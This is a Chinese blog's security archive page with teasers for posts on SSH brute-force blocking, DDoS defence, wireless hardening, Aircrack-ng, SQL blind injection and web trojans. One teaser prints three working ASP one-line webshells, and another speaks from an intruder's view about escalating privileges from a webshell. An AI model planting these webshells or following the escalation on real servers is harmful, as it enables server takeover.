分类存档: 安全

linux服务器阻止恶意的暴力ssh尝试登录

可以使用 DenyHosts 或 pam_tally2.so 实现
DenyHosts是Python语言编写的程序,主动分析登录日志文件/var/log/secure,对于多次连续的重复错误登录ip,加入/etc/hosts.deny,从而阻止这些暴力登录。
pam_tally2

继续阅读 »

windows web服务器提权方法总结

现在可以说网络管理员对服务器的设置是越来越BT,但BT的同时,也有黑客朋友们对服务器的不断的测试,在测试中往往获取最低的guest权限是简单的,像我们在入侵网站过程中,获取webshell是简单的,但是当由webshell的guest权限向system权限提升时却往往是止步不前。所以我有想写这样一篇文章的想法,但是在思考的过程中,又不得不承认,方法是不断的探索中出来的,方法更是有常规的也有另辟蹊径的。下面就做一些简单的介绍,对提权的方法进行一些介绍,同时也希望在更多朋友的不断回复中能够丰富我们的方法。
首先要说明的是,过早的一些漏洞我们就不再多说了,只说一些现在可以见到的吧。还有就是本文的题目是webshell下的服务器提权方法。
阅读全文——共4844字

asp一句话木马的总结分析

首先看一下 那些事一句话木马
<%eval request(“MH”)%>
<%execute request(“MH”)%>
<%execute(request(“MH”))%>
阅读全文——共2545字

无线破解利器:Aircrack-ng for Windows下载[附使用教程说明文档]

windows下强大的无线破解软件 Aircrack-ng for Windows 多个版本的下载
aircrack-ng-1.1-win (目前2012-06-122010-10-10官方最新稳定版本)
aircrack-ng-1.0-rc1-win (上一个版本)
aircrack-ng-0.3-win(比较老的版本,如有兴趣可以试用)
阅读全文——共433字

linux安全:分析Linux系统内核漏洞的问题

与Windows相比,Linux被认为具有更好的安全性和其他扩展性能。这些特性使得Linux在操作系统领域异军突起,得到越来越多的重 视。随着Linux应用量的增加,其安全性也逐渐受到了公众甚或黑客的关注。那么,Linux是否真的如其支持厂商们所宣称的那样安全呢?Linux内核精短、稳定性高、可扩展性好、硬件需求低、免费、网络功能丰富、适用于多种cpu等特性,使之在操作系统领域异军突起。其独特的 魅力使它不仅在pc机上占据一定的份额,而且越来越多地被使用在各种嵌入式设备中,并被当作专业的路由器,防火墙,或者高端的服务器OS来使用。各种类型 的Linux发行版本也如雨后春笋般冒了出来,国内更是掀起了Linux的使用热潮,很多政府部门因安全需要也被要求使用Linux。正是因为Linux 被越来越多地使用,其安全性也渐渐受到了公众的关注,当然,也更多地受到了黑客的关注。通常,我们讨论Linux系统安全都是从Linux安全配置的角度 或者Linux的安全特性等方面来讨论的,而这一次我们转换一下视角,从Linux系统中存在的漏洞与这些漏洞产生的影响来讨论Linux的安全性。
阅读全文——共7072字

五个方法打造安全无线网络/无线网络安全设置

谁动了你的无线网络流量?你有没有进行无线网络安全设置,保证你的网络安全呢?网络的安全越来越被人所重视,如果你还不知道怎么进行无线网络安全设置的话,那么就请仔细阅读下文吧,它将会为你详细列出五种方法。
随着科技的发展以及人们生活水平的提高,现代家庭中有两台以上的电脑是很平常的事情。很多家庭都选择无线路由器来分享上网,无线上网使人们摆脱了线 的纠缠,让人们在无线世界中自由的网上冲浪。但请注意,这里指的人们不只是你的家人还包括你的邻居甚至是一些陌生人。IEEE 802.11n草案的推出,无线路由的传输速度也有了质的飞跃。但很多用户只关注了传输速度却忽视了无线网络的安全。例如,在家中阳台上可以搜索到七八个 无线连接,其中便有连密码都不设的,可以轻松“分享”他的网络带宽。据调查显示,有90%的网络入侵是因为无线路由器没有进行相应的无线网络安全设置而引 发的。
阅读全文——共1877字

预防DDOS攻击方法集锦总结

一篇很老的文章,至少是06年前的,可能参考一下。
不知道身为网络管理员的你是否遇到过服务器因为拒绝服务攻击都瘫痪的情况呢?就网络安全而言目前最让人担心和害怕的入侵攻击就要算是拒绝服务攻击了。他和传统的攻击不同,采取的是仿真多个客户端来连接服务器,造成服务器无法完成如此多的客户端连接,从而无法提供服务。
一、拒绝服务攻击的发展
从拒绝服务攻击诞生到现在已经有了很多的发展,从最初的简单Dos到现在的DdoS。那么什么是Dos和DdoS呢?DoS是一种利用单台计算 机的攻击方式。而DdoS(Distributed Denial of Service,分布式拒绝服务)是一种基于DoS的特殊形式的拒绝服务攻击,是一种分布、协作的大规模攻击方式,主要瞄准比较大的站点,比如一些商业公 司、搜索引擎和政府部门的站点。DdoS攻击是利用一批受控制的机器向一台机器发起攻击,这样来势迅猛的攻击令人难以防备,因此具有较大的破坏性。如果说 以前网络管理员对抗Dos可以采取过滤IP地址方法的话,那么面对当前DdoS众多伪造出来的地址则显得没有办法。所以说防范DdoS攻击变得更加困难, 如何采取措施有效的应对呢?下面我们从两个方面进行介绍。
阅读全文——共2532字

DDOS攻击监测工具软件DDOS_Monitor下载

一款小巧简单的DDOS监测工具DDOS_Monitor (windows平台下),可以用来检测判断网络状态,不需安装,直接解压缩使用。

下面是说明文档
———————————————–
阅读全文——共1553字

各种网页挂马方式原理揭密/iframe挂马,script 挂马,图片伪装挂马等

现在,网站经常被各种网页挂马,为了保障大家网站的安全和互联网用户的安全,有必要对网页挂马有所了解。
查了一些资料,由于存在大量的黑客软件,一个菜鸟只需几分钟就可以编写一个木马网页,对别人的网站进行挂马了。 下面介绍集中常见的网页挂马方式:
(1)iframe 框架挂马

阅读全文——共3096字

SQL盲注攻击技术概览综述

本文对目前SQL注入攻击中使用的盲注技术进行了综述。本文首先介绍了普通SQL注入技术的定义和危害,回顾了几种已被提出的针对SQL注入的防御手段及 其各自的缺点,然后讨论了在错误信息被屏蔽或掩饰的情况下探测SQL注入漏洞是否存在所需的服务器最小响应,以及如何确定注入点和确定正确的注入句法并构 造利用代码。最后本文还以UNION SELECT语句为例,详细介绍了利用该语句在盲注条件下统计数据表的列数和判断列的数据类型的方法和步骤。本文中给出的例子都是针对Microsoft SQL Server和Oracle的,但同样的技术也可以被应用到其他数据库系统。本文的目的是明确应用程序级别的漏洞只能通过应用程序级别的方案才能解决,仅仅依靠屏蔽错误信息来回避SQL注入攻击是无益的。
阅读全文——共13084字

Pages: 1 2 3 4 5 6 7 Next